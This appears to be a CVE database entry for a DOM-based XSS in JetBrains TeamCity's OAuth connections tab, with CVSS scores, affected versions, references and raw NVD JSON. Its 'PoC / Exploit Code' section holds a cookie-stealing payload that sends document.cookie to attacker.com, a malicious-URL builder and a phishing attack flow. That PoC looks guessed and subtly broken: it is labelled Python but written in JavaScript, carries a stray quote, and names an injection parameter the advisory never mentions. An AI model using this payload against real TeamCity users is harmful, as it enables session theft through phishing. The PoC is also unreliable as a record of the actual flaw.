CVE-2025-68166

Description

In JetBrains TeamCity before 2025.11 a DOM-based XSS was possible on the OAuth connections tab

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* - VULNERABLE

JetBrains TeamCity < 2025.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-68166 DOM-based XSS PoC for JetBrains TeamCity
// Target: OAuth connections tab in TeamCity < 2025.11

const targetUrl = 'https://[TEAMCITY_HOST]/oauth/connections';

// Malicious payload - XSS via OAuth state parameter
const maliciousPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">"';

// Construct the malicious URL
const maliciousUrl = `${targetUrl}?state=${encodeURIComponent(maliciousPayload)}&connection=google`;

console.log('[+] CVE-2025-68166 - JetBrains TeamCity DOM-based XSS');
console.log('[+] Target:', targetUrl);
console.log('[+] Malicious URL:', maliciousUrl);
console.log('[+] Payload:', maliciousPayload);

// Social engineering component - create a convincing link
const phishingLink = `
[+] Attack Flow:
1. Attacker crafts malicious OAuth link with XSS payload
2. Victim is tricked into clicking the link
3. Malicious script executes in victim's browser
4. Attacker steals session cookies or performs actions as victim
`;

console.log(phishingLink);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68166
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68166
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68166/
[4] VulDB https://vuldb.com/cve/CVE-2025-68166
[5] https://www.jetbrains.com/privacy-security/issues-fixed/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68166", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:16:06.390", "lastModified": "2025-12-18T19:20:38.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains TeamCity before 2025.11 a DOM-based XSS was possible on the OAuth connections tab"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.11", "matchCriteriaId": "D80D5E22-CFD6-4363-948C-9473EFCE21A5"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}